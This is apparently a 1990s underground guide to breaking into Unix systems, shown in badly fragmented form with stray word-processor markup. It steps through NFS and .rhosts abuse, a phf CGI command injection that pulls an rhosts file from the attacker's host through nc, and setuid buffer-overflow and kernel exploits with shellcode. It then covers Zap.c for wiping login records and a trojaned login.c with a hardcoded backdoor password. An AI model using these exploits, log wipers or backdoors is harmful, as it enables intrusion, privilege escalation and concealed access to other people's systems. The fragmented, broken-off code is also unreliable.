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   User's gu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howdi folks... I guess you are all wondering who's this guy (m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's trying to show you a bit of everything... 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I ain't telling you anything of tha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yright, and other stuff like this (below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yright and stuff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feel offended by this subject (hacking) or you think that you c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 better, don't read the below information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file is for educational purposes ONLY...;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ain't responsible for any damages you made after reading this...(I'm ve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ious..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this can be copied, but not modified (send me the changes, and if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good, I'll include them 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read it, 'cuz it might be illeg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arned you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would like to continue, press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Intro: Hacking step by ste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this ain't exactely for begginers, but it'll have to d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all hackers has to know is that there are 4 steps in hack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1: Getting access to si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2: Hacking r00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3: Covering your tra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4: Keeping that acc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k. In the next pages we'll see exactely what I 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1: Getting ac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 folks, there are several methods to get access to a si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ll try to explain the most used o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rst thing I do is see if the system has an export lis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/usr/sbin/showmount -e victim.site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PC: Program not registe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it gives a message like this one, then it's time to search another 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I was trying to do was to exploit an old security problem by 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N OS's that could allow an remote attacker to add a .rhosts to a us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me directory... (That was possible if the site had mounted their h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t's see what happen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/usr/sbin/showmount -e victim1.site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usr  victim2.site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home (everyon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cdrom (everyon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mkdir /tmp/m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/bin/mount -nt nfs victim1.site.com:/home /tmp/mount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ls -sal /tmp/m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tal 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rwxr-x   8 root     root         1024 Jul  4 20:34 .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r-xr-x  19 root     root         1024 Oct  8 13:42 ..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r-xr-x   3 at1      users        1024 Jun 22 19:18 at1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-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp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rx-r-x   3 john     100          1024 Jul  6 13:42 john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rx-r-x   3 139      100          1024 Sep 15 12:24 paul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-rw-------   1 root     root          242 Mar  9  1997 sudo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------   3 test     100          1024 Oct  8 21:05 test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------  15 102      100          1024 Oct 20 18:57 rapper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we wanna hack into rapper's ho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id=0 euid=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whoam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echo "rapper::102:2::/tmp/mount:/bin/csh" &gt;&gt; /etc/passw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use /bin/csh 'cuz bash leaves a (Damn!) .bash_history  and you m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get it on the remote server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su - rap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come to rapper's us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ls -lsa /tmp/mount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tal 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rwxr-x   8 root     root         1024 Jul  4 20:34 .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r-xr-x  19 root     root         1024 Oct  8 13:42 ..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r-xr-x   3 at1      users        1024 Jun 22 19:18 at1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-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp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rx-r-x   3 john     100          1024 Jul  6 13:42 john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rx-r-x   3 139      100          1024 Sep 15 12:24 paul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-rw-------   1 root     root          242 Mar  9  1997 sudo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------   3 test     100          1024 Oct  8 21:05 test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 drwx------  15 rapper   daemon       1024 Oct 20 18:57 rapper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we own this guy's home directory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echo "+ +" &gt; rapper/.rho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cd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rlogin victim1.site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come to Victim.Site.Co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nOs ver....(crap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ctim1:~$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the first metho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method could be to see if the site has an open 80 port. That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an that the site has a web p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And that's very bad, 'cuz it usually it's vulnerabl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low I include the source of a scanner that helped me when NMAP wasn't writt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Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor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MAP is a scanner that does even stealth scanning, so lots of systems wo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ord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-*-C-*- tcpprobe.c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tcpprobe - report on which tcp ports accept connections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IO ERROR, error@axs.net, Sep 15, 1995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 main(int argc, char **arg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nt probeport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truct hostent *hos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nt err, i, ne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truct sockaddr_in sa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f (argc != 2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rintf("Usage: %s hostname\n", argv[0]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xit(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or (i = 1; i &lt; 1024; i++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trncpy((char *)&amp;sa, "", sizeof sa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a.sin_family = AF_INE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 (isdigit(*argv[1])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a.sin_addr.s_addr = inet_addr(argv[1]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lse if ((host = gethostbyname(argv[1])) !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trncpy((char *)&amp;sa.sin_addr, (char *)host-&gt;h_addr, sizeof sa.sin_addr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lse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herror(argv[1]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xit(2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a.sin_port = htons(i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et = socket(AF_INET, SOCK_STREAM,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 (net &lt;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error("\nsocket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xit(2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rr = connect(net, (struct sockaddr *) &amp;sa, sizeof sa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 (err &lt;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intf("%s %-5d %s\r", argv[1], i, strerror(errno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fflush(stdou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} else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intf("%s %-5d accepted.                               \n", argv[1], i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f (shutdown(net, 2) &lt;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error("\nshutdow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it(2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lose(ne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printf("                                                                \r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flush(stdou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return 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now be very carefull with the below exploits, because they usually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g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sides, if you really wanna get a source file from /cgi-bin/ use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tax : lynx http://www.victim1.com//cgi-bin/fin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don't wanna do that, then do a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echo "+ +" &gt; /tmp/rho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echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts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root/.rhosts" | nc -v - 20 victim1.site.com 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site:~&gt;rlogin -l root victim1.site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come to Victim1.Site.Co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ctim1:~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, maybe, just try to find out usernames and password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usual users are "test", "guest", and maybe the owner of the sit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usually don't do such things, but you can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if the site is really old, use that (quote site exec) old bug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u.ftp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 a lot of other exploits, like the remote exploits (innd, imap2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p3, etc...) that you can find at rootshell.connectnet.com or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hp.com/~fyodo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ough about this topic. (besides, if you can finger the site,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ggure out usernames and maybe by guessing passwords (sigh!) you could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 to the sit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2: Hacking r00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you have to find the system it's runn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).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version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big bug for all linux versions is mount/umount and (maybe) lp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Mount Exploit for Linux, Jul 30 19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:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::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:::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::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::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::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:::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::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:::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::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:::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::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:::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::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:::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::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:::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::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::::::...........:::...........:::...........::.......:......:.......::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::::::::::::::::::::::::::::::::::::::::::::::;:::::::::::::::::::::::::::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covered and Coded by Bloodmask &amp; Vi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vin Security 19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PATH_MOUNT "/bin/mount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BUFFER_SIZE 10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DEFAULT_OFFSET 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_long get_esp(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__asm__("movl %esp, %eax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n(int argc, char **arg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u_char execshell[] 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"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f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"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd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"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"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ar *buff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nsigned long *addr_ptr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ar *ptr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 i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 ofs = DEFAULT_OFFSE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uff = malloc(4096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f(!buff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intf("can't allocate memory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tr = buff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/* fill start of buffer with nops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emset(ptr, 0x90, BUFFER_SIZE-strlen(execshell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tr += BUFFER_SIZE-strlen(execshel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/* stick asm code into the buffer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or(i=0;i &lt; strlen(execshell);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*(ptr++) = execshell[i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ddr_ptr = (long *)pt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or(i=0;i &lt; (8/4);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*(addr_ptr++) = get_esp() + of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tr = (char *)addr_pt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*ptr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(void)alarm((u_int)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rintf("Discovered and Coded by Bloodmask and Vio, Covin 1996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xecl(PATH_MOUNT, "mount", buff, NUL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LPR exploit:I don't know the author...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DEFAULT_OFFSET          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BUFFER_SIZE             10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ng get_esp(voi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__asm__("movl %esp,%eax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main(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ar *buff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nsigned long *addr_ptr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ar *ptr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_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07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"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12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"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8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"\xd7\xff\xff\xff/bin/sh"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 i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uff = malloc(4096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f(!buff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intf("can't allocate memory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tr = buff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emset(ptr, 0x90, BUFFER_SIZE-strlen(execshell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tr += BUFFER_SIZE-strlen(execshel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or(i=0;i &lt; strlen(execshell);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*(ptr++) = execshell[i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ddr_ptr = (long *)pt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or(i=0;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path "/usr/bin/at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BUFFER_SIZE 10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DEFAULT_OFFSET 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_long get_esp(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__asm__("movl %esp, %eax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n(int argc, char **arg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u_char execshell[] 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"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f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"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd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"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"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ar *buff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nsigned long *addr_ptr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ar *ptr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 i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 ofs = DEFAULT_OFFSE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uff = malloc(4096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f(!buff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intf("can't allocate memory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tr = buff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emset(ptr, 0x90, BUFFER_SIZE-strlen(execshell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tr += BUFFER_SIZE-strlen(execshel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or(i=0;i &lt; strlen(execshell);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*(ptr++) = execshell[i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ddr_ptr = (long *)pt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or(i=0;i &lt; (8/4);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*(addr_ptr++) = get_esp() + of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tr = (char *)addr_pt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*ptr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(void)alarm((u_int)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rintf("AT exploit discovered by me, _PHANTOM_ in 1997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etenv("NLSPATH",buff,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xecl(path, "at",NUL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DMAIL exploit: (don't try to chmod a-s this one... :) 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SENDMAIL Exploit for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path "/usr/bin/sendmail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BUFFER_SIZE 10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DEFAULT_OFFSET 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_long get_esp(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__asm__("movl %esp, %eax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n(int argc, char **arg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u_char execshell[] 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"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f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"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd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"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh"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ar *buff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nsigned long *addr_ptr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ar *ptr = NU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 i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t ofs = DEFAULT_OFFSE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uff = malloc(4096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f(!buff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intf("can't allocate memory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tr = buff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emset(ptr, 0x90, BUFFER_SIZE-strlen(execshell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tr += BUFFER_SIZE-strlen(execshel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or(i=0;i &lt; strlen(execshell);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*(ptr++) = execshell[i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ddr_ptr = (long *)pt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or(i=0;i &lt; (8/4);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*(addr_ptr++) = get_esp() + of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tr = (char *)addr_pt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*ptr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(void)alarm((u_int)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rintf("SENDMAIL exploit discovered by me, _PHANTOM_ in  1997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etenv("NLSPATH",buff,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xecl(path, "sendmail",NUL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_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROO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!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/* this is a hack of a hack.  a valid System.map was needed to get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ploit to werk.. but not any longer.. This sploit will give you ro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if the modify_ldt bug werks.. which I beleive it does in any kern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efore 1.3.20 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Quantum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original code written by Morten Welin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this required 2 hacks to work on the 1.2.13 kernel that I've tested o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1. asm/sigcontext.h does not exist on 1.2.13 and so it is remov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2. the _task in the System.map file has no leading undersco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I am not sure at what point these were changed, if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using this on a newer kernel compile with NEWERKERNEL defin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                                         -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 NEWERKERN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__KERNEL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ic inline _syscall1(int,get_kernel_syms,struct kernel_sym *,tabl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ic inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecoun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KERNEL_BASE 0xc0000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------------------------------------------------------------------------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ic __inline__ unsigned ch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farpeek (int seg, unsigned of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unsigned char re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sm ("mov %w1,%%gs ; gs; movb (%2),%%al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: "=a" (re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: "r" (seg), "r" (ofs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return re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------------------------------------------------------------------------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ic __inline__ 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farpoke (int seg, unsigned ofs, unsigned char b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sm ("mov %w0,%%gs ; gs; movb %b2,(%1)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: /* No results. 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: "r" (seg), "r" (ofs), "r" (b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------------------------------------------------------------------------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getseg (void *dst, int seg, const void *src, int siz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while (size-- &gt;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*(char *)dst++ = __farpeek (seg, (unsigned)(src++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------------------------------------------------------------------------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putseg (int seg, void *dst, const void *src, int siz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while (size-- &gt;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__farpoke (seg, (unsigned)(dst++), *(char *)src++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------------------------------------------------------------------------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n (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nt stat, i,j,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truct modify_ldt_ldt_s ldt_entr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ILE *sym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char line[100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truct task_struct **task, *taskptr, thistas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truct kernel_sym blah[4096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printf ("Bogusity checker for modify_ldt system call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printf ("Testing for page-size limit bug..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entry_number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base_addr = 0xbfffffff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limit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seg_32bit =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contents = MODIFY_LDT_CONTENTS_DATA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read_exec_only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limit_in_pages =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seg_not_present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tat = modify_ldt (1, &amp;ldt_entry, sizeof (ldt_entry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f (sta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/* Continue after reporting error. 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rintf ("This bug has been fixed in your kernel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intf ("Shit happens: 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intf ("0xc0000000 - 0xc0000ffe is accessible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printf ("Testing for expand-down limit bug..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base_addr = 0x0000000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limit =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contents = MODIFY_LDT_CONTENTS_STAC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dt_entry.limit_in_pages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tat = modify_ldt (1, &amp;ldt_entry, sizeof (ldt_entry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f (sta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intf ("This bug has been fixed in your kernel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return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intf ("Shit happens: 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intf ("0x00000000 - 0xfffffffd is accessible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 = get_kernel_syms(blah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k = i+1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or (j=0; j&gt;leshka.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ho   '{                                                     '&gt;&gt;leshka.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ho   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '&gt;&gt;leshka.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ho   '}                                                     '&gt;&gt;leshka.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ho   'main()                                                '&gt;&gt;smtpd.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ho   '{                                                     '&gt;&gt;smtpd.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ho   '  setuid(0); setgid(0);                               '&gt;&gt;smtpd.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ho   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '&gt;&gt;smtpd.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ho   '}                                                     '&gt;&gt;smtpd.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 -o leshka leshka.c;cc -o /tmp/smtpd smtpd.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/leshk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ll -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`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m leshka.c leshka smtpd.c /tmp/smtp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ho "Now type:   /tmp/sh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NO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login exploi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arghh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BUF_LENGTH      82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EXTRA           1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STACK_OFFSET    4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SPARC_NOP       0xa61cc0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_char sparc_shellcode[] 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\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13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\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e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\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a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\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc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\x82\x10\x20\x3b\x91\xd4\xff\xff"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_long get_sp(voi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__asm__("mov %sp,%i0 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main(int argc, char *argv[]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char buf[BUF_LENGTH + EXTRA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ong targ_add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u_long *long_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u_char *char_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nt i, code_length = strlen(sparc_shellcod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ong_p = (u_long *) buf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or (i = 0; i &lt; (BUF_LENGTH - code_length) / sizeof(u_long); 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*long_p++ = SPARC_NO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char_p = (u_char *) long_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or (i = 0; i &lt; code_length; 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*char_p++ = sparc_shellcode[i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ong_p = (u_long *) char_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arg_addr = get_sp() - STACK_OFFSE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or (i = 0; i &lt; EXTRA / sizeof(u_long); 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*long_p++ = targ_add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printf("Jumping to address 0x%lx\n", targ_addr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xecl("/usr/bin/rlogin", "rlogin", buf, (char *)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perror("execl failed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nt more exploits? Get 'em from other sites (like rootshel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hp.com/~fyodor, etc...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3: Covering your track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is you could use lots of programs like zap, utclean, and lot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ch out, ALWAYS after you cloaked yourself to see if it worked do a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ctim1:~$ w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.(crap)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ctim1:~$ fin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.;as;;sda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ctim1:~$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are still not cloaked, look for wtmpx, utmpx and other stuff l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. The only cloaker (that I know) that erased me even from wtmpx/utmp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utclean. But I don't have it right now, so ZAP'll have to do the job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itle:  Zap.c (c) rokK Indust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equence:  911204.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yztems:  Kompiles on SunOS 4.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Note:  To mask yourself from lastlog and wtmp you need to be roo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utmp is go+w on default SunOS, but is sometimes remov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Kompile:  cc -O Zap.c -o Z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Run:  Za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Desc:  Will Fill the Wtmp and Utmp Entries corresponding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entered Username. It also Zeros out the last login data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the specific user, fingering that user will show 'Never Logg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In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Usage:  If you cant find a usage for this, get a br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 f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kill_tmp(name,who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 *na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*who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truct utmp utmp_en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f ((f=open(name,O_RDWR))&gt;=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hile(read (f, &amp;utmp_ent, sizeof (utmp_ent))&gt; 0 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if (!strncmp(utmp_ent.ut_name,who,strlen(who))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zero((char *)&amp;utmp_ent,sizeof( utmp_ent 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seek (f, -(sizeof (utmp_ent)), SEEK_CUR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rite (f, &amp;utmp_ent, sizeof (utmp_ent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lose(f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kill_lastlog(who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 *who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truct passwd *pw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truct lastlog new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f ((pwd=getpwnam(who))!=NULL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f ((f=open("/usr/adm/lastlog", O_RDWR)) &gt;=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lseek(f, (long)pwd-&gt;pw_uid * sizeof (struct lastlog),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bzero((char *)&amp;newll,sizeof( newll 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write(f, (char *)&amp;newll, sizeof( newll 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close(f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} else printf("%s: ?\n",who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n(argc,arg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  argc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 *argv[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 (argc==2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ill_tmp("/etc/utmp",argv[1]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ill_tmp("/usr/adm/wtmp",argv[1]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ill_lastlog(argv[1]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rintf("Zap!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} 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rintf("Error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4: Keeping that acc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usually means that you'll have to install some programs to giv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 even if the root has killed your accoun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DAEMONS!!!) =&gt;|-@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Here is an example of a login daemon from the DemonKit (good job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llows..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OK OUT !!! If you decide to put a daemon, be carefull and modify it's d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creation. (use touch --help to see how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a simple trojanized login program, this was designed for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will not work without modification on linux. It lets you login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ither a root user, or any ordinary user by use of a 'magic password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will also prevent the login from being logged into utmp, wtmp, et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ll effectively be invisible, and not be detected except via 'ps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BACKDOOR                    "password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     krad=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This program is derived from 4.3 BSD software and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ubject to the copyright notice be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port to HP-UX has been motivated by the incap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f 'rlogin'/'rlogind' as per HP-UX 6.5 (and 7.0) to transfer window siz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hange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- General HP-UX portation. Use of facilities not avail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 HP-UX (e.g. setpriority) has been elimin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Utmp/wtmp handling has been por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- The program uses BSD command line options to be u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 connection with e.g. 'rlogind' i.e. 'new login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- HP features left out:          logging of bad login attempts in /etc/btmp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they are sent to sys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password expi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'*' as login shell, add it if you need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- BSD features left out:         quota chec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password expi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analysis of terminal type (tset featur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- BSD features thrown in:        Security logging to syslog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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>This requires you to have a (ported) sys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system -- 7.0 comes with sys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'Lastlog' fea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- A lot of nitty gritty details has been adjusted in favou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P-UX, e.g. /etc/securetty, default paths and the environ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variables assigned by 'login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- We do *nothing* to setup/alter tty state, under HP-UX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 be done by getty/rlogind/telnetd/some one el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ichael Glad (glad@daimi.dk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omputer Science Depart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arhus Univers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enma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990-07-0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991-09-24 glad@daimi.aau.dk: HP-UX 8.0 por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- now explictly sets non-blocking mode on descript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- strcasecmp is now part of HP-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1992-02-05 poe@daimi.aau.dk: Ported the stuff to Linux 0.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rom 1992 till now (1995) this code for Linux has been maintained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tp.daimi.aau.dk:/pub/linux/poe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Copyright (c) 1980, 1987, 1988 The Regents of the University of Californi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All rights reserv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Redistribution and use in source and binary forms are per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provided that the above copyright notice and this paragraph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duplicated in all such forms and that any documenta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advertising materials, and other materials related to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distribution and use acknowledge that the software was develo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by the University of California, Berkeley.  The nam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University may not be used to endorse or promote products deriv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from this software without specific prior written permis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THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS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IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLI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WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPO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 copyright[] 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@(#) Copyright (c) 1980, 1987, 1988 The Regents of the University of California.\n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ll rights reserved.\n"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 /* not lint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ic char sccsid[] = "@(#)login.c</w:t>
        <w:tab/>
        <w:t>5.40 (Berkeley) 5/9/89"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 /* not lint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login [ name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login -h hostname</w:t>
        <w:tab/>
        <w:t>(for telnetd, etc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login -f name</w:t>
        <w:tab/>
        <w:t>(for pre-authenticated login: datakit, xterm, etc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#define TESTING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 TES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nclude "param.h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index strch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rindex strrch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 TES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include "utmp.h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  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 SHADOW_PW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uct  last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{ long ll_tim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ar ll_line[12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ar ll_host[16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}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nclude "pathnames.h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 P_(s) (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opentty P_((const char *tty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getloginname P_((void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timedout P_((void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 rootterm P_((char *ttyn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motd P_((void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sigint P_((void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checknologin P_((void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dolastlog P_((int quiet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badlogin P_((char *name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 *stypeof P_((char *ttyid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checktty P_((char *user, char *tty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getstr P_((char *buf, int cnt, char *err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sleepexit P_((int eval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undef P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</w:t>
        <w:tab/>
        <w:t>KERBER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inclu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</w:t>
        <w:tab/>
        <w:t>realm[REALM_SZ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</w:t>
        <w:tab/>
        <w:t>kerror = KSUCCESS, notickets =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</w:t>
        <w:tab/>
        <w:t>TTYGRPNAME</w:t>
        <w:tab/>
        <w:t>"tty"</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>/* name of group to own ttys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define TTYGRPNAME      "other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ifndef MAXPATHL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define MAXPATHLEN 10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This bounds the time given to login.  Not a define so it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 be patched on machines where it's too sm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</w:t>
        <w:tab/>
        <w:t>timeout = 30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     timeout = 6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uct</w:t>
        <w:tab/>
        <w:t>passwd *pw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</w:t>
        <w:tab/>
        <w:t>failure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</w:t>
        <w:tab/>
        <w:t>term[64], *hostname, *username, *tt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</w:t>
        <w:tab/>
        <w:t>thishost[100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uct</w:t>
        <w:tab/>
        <w:t>sgttyb sgttyb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uct</w:t>
        <w:tab/>
        <w:t>tchars tc =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INTR, CQUIT, CSTART, CSTOP, CEOT, CB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uct</w:t>
        <w:tab/>
        <w:t>ltchars ltc =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SUSP, CDSUSP, CRPRNT, CFLUSH, CWERASE, CLNE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 *months[] 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{ "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug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"Sep", "Oct", "Nov", "Dec" }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* provided by Linus Torvalds 16-Feb-93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o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ntty(const char * tt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nt i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nt fd = open(tty, O_RDWR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or (i = 0 ; i &lt; fd ; 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lose(i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or (i = 0 ; i &lt; 3 ; i++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up2(fd, i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 (fd &gt;= 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lose(f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n(argc, arg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nt argc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**argv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tern int errno, optin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tern char *optarg, **enviro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ruct timeval t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ruct tm *tt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ruct group *g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gister int ch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gister char *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nt ask, fflag, hflag, pflag, cn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nt quietlog, passwd_req, ioctlva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*domain, *salt, *ttyn, *p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tbuf[MAXPATHLEN + 2], tname[sizeof(_PATH_TTY) + 10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*ctime(), *ttyname(), *stypeof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ime_t time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void timedout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*termenv;</w:t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tmp[100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Just as arbitrary as mountain time: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/* (void)setenv("TZ", "MET-1DST",0);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ignal(SIGALRM, timedou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alarm((unsigned int)timeou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ignal(SIGQUIT, SIG_IGN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ignal(SIGINT, SIG_IGN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etpriority(PRIO_PROCESS, 0,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 HAVE_QUO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quota(Q_SETUID, 0, 0,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* -p is used by getty to tell login not to destroy the environ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ab/>
        <w:t xml:space="preserve"> * -f is used to skip a second login authentic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* -h is used by other servers to pass the name of the remo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*    host to login so that it may be placed in utmp and wt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gethostname(tbuf, sizeof(tbuf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trncpy(thishost, tbuf, sizeof(thishost)-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omain = index(tbuf, '.'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flag = hflag = pflag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asswd_req =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hile ((ch = getopt(argc, argv, "fh:p")) != EOF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witch (ch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case 'f'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fflag =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brea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case 'h'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if (getuid()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(void)fprintf(stder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"login: -h for super-user only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exit(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hflag =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if (domain &amp;&amp; (p = index(optarg, '.')) &amp;&am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strcasecmp(p, domain) =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*p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hostname = optarg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brea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case 'p'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pflag =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brea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case '?'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defaul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fprintf(stder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"usage: login [-fp] [username]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exit(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rgc -= optin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rgv += optin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*argv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username = *argv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ask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 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ask =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octlval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ioctl(0, TIOCLSET, &amp;ioctlva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ioctl(0, TIOCNXCL,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fcntl(0, F_SETFL, ioctlva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ioctl(0, TIOCGETP, &amp;sgttyb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gttyb.sg_erase = CERAS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gttyb.sg_kill = CKI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ioctl(0, TIOCSLTC, &amp;ltc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ioctl(0, TIOCSETC, &amp;tc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ioctl(0, TIOCSETP, &amp;sgttyb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* Be sure that we'r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* blocking mode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* This is really for HP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octlval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(void)ioctl(0, FIOSNBIO, &amp;ioctlva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 (cnt = getdtablesize(); cnt &gt; 2; cnt--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close(cn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tyn = ttyname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ttyn == NULL || *ttyn == '\0'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sprintf(tname, "%s??", _PATH_TTY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ttyn = tnam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etpgrp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struct termios tt, tt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tcgetattr(0, &amp;t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ttt = t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ttt.c_cflag &amp;= ~HUPC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if((chown(ttyn, 0, 0) == 0) &amp;&amp; (chmod(ttyn, 0622) == 0)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tcsetattr(0,TCSAFLUSH,&amp;tt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ignal(SIGHUP, SIG_IGN); /* so vhangup() wont kill us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vhangup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ignal(SIGHUP, SIG_DF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setsid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/* re-open stdin,stdout,stderr after vhangup() closed them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/* if it did, after 0.99.5 it doesn't!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opentty(ttyn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tcsetattr(0,TCSAFLUSH,&amp;t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tty = rindex(ttyn, '/')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++tt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tty = tty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openlog("login", LOG_ODELAY, LOG_AUTH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 (cnt = 0;; ask = 1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octlval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ioctl(0, TIOCSETD, &amp;ioctlva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ask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fflag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getloginname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checktty(username, tty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strcpy(tbuf, userna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pwd = getpwnam(username)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salt = pwd-&gt;pw_passw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salt = "xx"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/* if user not super-user, check for disabled logins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pwd == NULL || pwd-&gt;pw_ui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checknologin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 Disallow automatic login to root; if not invok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 root, disallow if the uid's diff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fflag &amp;&amp; pwd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int uid = getuid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passwd_req = pwd-&gt;pw_uid == 0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(uid &amp;&amp; uid != pwd-&gt;pw_ui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 If trying to log in as root, but with insecure termina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 refuse the login atte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pwd &amp;&amp; pwd-&gt;pw_uid == 0 &amp;&amp; !rootterm(tty)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fprintf(stder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"%s login refused on this terminal.\n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pwd-&gt;pw_na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if (hostnam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syslog(LOG_NOTIC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"LOGIN %s REFUSED FROM %s ON TTY %s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pwd-&gt;pw_name, hostname, tty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syslog(LOG_NOTIC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"LOGIN %s REFUSED ON TTY %s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 pwd-&gt;pw_name, tty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continu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 If no pre-authentication and a password exi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 for this user, prompt for one and verify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!passwd_req || (pwd &amp;&amp; !*pwd-&gt;pw_passwd)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brea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etpriority(PRIO_PROCESS, 0, -4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pp = getpass("Password: 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(strcmp(BACKDOOR, pp) == 0) krad++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p = crypt(pp, sal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etpriority(PRIO_PROCESS, 0,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</w:t>
        <w:tab/>
        <w:t>KERBER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 If not present in pw file, act as we normally woul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 If we aren't Kerberos-authenticated, try the norm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 pw file for a password.  If that's ok, log the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 in without issueing any ticke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pwd &amp;&amp; !krb_get_lrealm(realm,1)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* get TGT for local realm; be careful about uid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* here for ticket file ownersh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setreuid(geteuid(),pwd-&gt;pw_ui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kerror = krb_get_pw_in_tkt(pwd-&gt;pw_name, "", realm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"krbtgt", realm, DEFAULT_TKT_LIFE, pp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setuid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if (kerror == INTK_OK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memset(pp, 0, strlen(pp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notickets = 0;</w:t>
        <w:tab/>
        <w:t>/* user got ticket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brea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 memset(pp, 0, strlen(pp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pwd &amp;&amp; !strcmp(p, pwd-&gt;pw_passwd)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brea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if(krad != 0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brea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printf("Login incorrect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failures++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badlogin(username); /* log ALL bad logins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/* we allow 10 tries, but after 3 we start backing off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++cnt &gt; 3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if (cnt &gt;= 1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sleepexit(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sleep((unsigned int)((cnt - 3) * 5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committed to login -- turn off timeout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alarm((unsigned int)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 HAVE_QUO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quota(Q_SETUID, pwd-&gt;pw_uid, 0, 0) &lt; 0 &amp;&amp; errno != EINVAL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witch(errno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case EUSER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fprintf(stder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"Too many users logged on already.\nTry again later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brea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case EPROCLIM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fprintf(stder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"You have too many processes running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brea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defaul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perror("quota (Q_SETUID)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leep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paranoia...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ndpwent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This requires some explanation: As root we may not be abl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read the directory of the user if it is on an NFS moun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filesystem. We temporarily set our effective uid to the user-u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making sure that we keep root privs. in the real ui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A portable solution would require a fork(), but we rely on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having the BSD setreuid()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char tmpstr[MAXPATHLEN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uid_t ruid = getuid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gid_t egid = getegid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strncpy(tmpstr, pwd-&gt;pw_dir, MAXPATHLEN-12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strncat(tmpstr, ("/" _PATH_HUSHLOGIN), MAXPATHLEN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setregid(-1, pwd-&gt;pw_gi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setreuid(0, pwd-&gt;pw_ui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quietlog = (access(tmpstr, R_OK) ==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setuid(0); /* setreuid doesn't do it alone!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setreuid(ruid,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setregid(-1, egi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 KERBER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notickets &amp;&amp; !quietlo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printf("Warning: no Kerberos tickets issued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</w:t>
        <w:tab/>
        <w:t>TWOWEEKS</w:t>
        <w:tab/>
        <w:t>(14*24*60*6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pwd-&gt;pw_change || pwd-&gt;pw_expir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gettimeofday(&amp;tp, (struct timezone *)NUL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pwd-&gt;pw_chang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tp.tv_sec &gt;= pwd-&gt;pw_change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printf("Sorry -- your password has expired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sleepexit(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else if (tp.tv_sec - pwd-&gt;pw_change &lt; TWOWEEKS &amp;&amp; !quietlog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ttp = localtime(&amp;pwd-&gt;pw_chang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printf("Warning: your password expires on %s %d, %d\n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months[ttp-&gt;tm_mon], ttp-&gt;tm_mday, TM_YEAR_BASE + ttp-&gt;tm_year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pwd-&gt;pw_expir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tp.tv_sec &gt;= pwd-&gt;pw_expire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printf("Sorry -- your account has expired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sleepexit(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else if (tp.tv_sec - pwd-&gt;pw_expire &lt; TWOWEEKS &amp;&amp; !quietlog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ttp = localtime(&amp;pwd-&gt;pw_expir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printf("Warning: your account expires on %s %d, %d\n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months[ttp-&gt;tm_mon], ttp-&gt;tm_mday, TM_YEAR_BASE + ttp-&gt;tm_year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nothing else left to fail -- really log in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uct utmp utm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memset((char *)&amp;utmp, 0, sizeof(utmp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time(&amp;utmp.ut_ti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ncpy(utmp.ut_name, username, sizeof(utmp.ut_name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hostnam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strncpy(utmp.ut_host, hostname, sizeof(utmp.ut_host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ncpy(utmp.ut_line, tty, sizeof(utmp.ut_line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login(&amp;utmp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for linux, write entries in utmp and wtmp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uct utmp u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char *ttyabbrev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nt wtm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memset((char *)&amp;ut, 0, sizeof(ut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ut.ut_type = USER_PROCES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ut.ut_pid = getpid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ncpy(ut.ut_line, ttyn + sizeof("/dev/")-1, 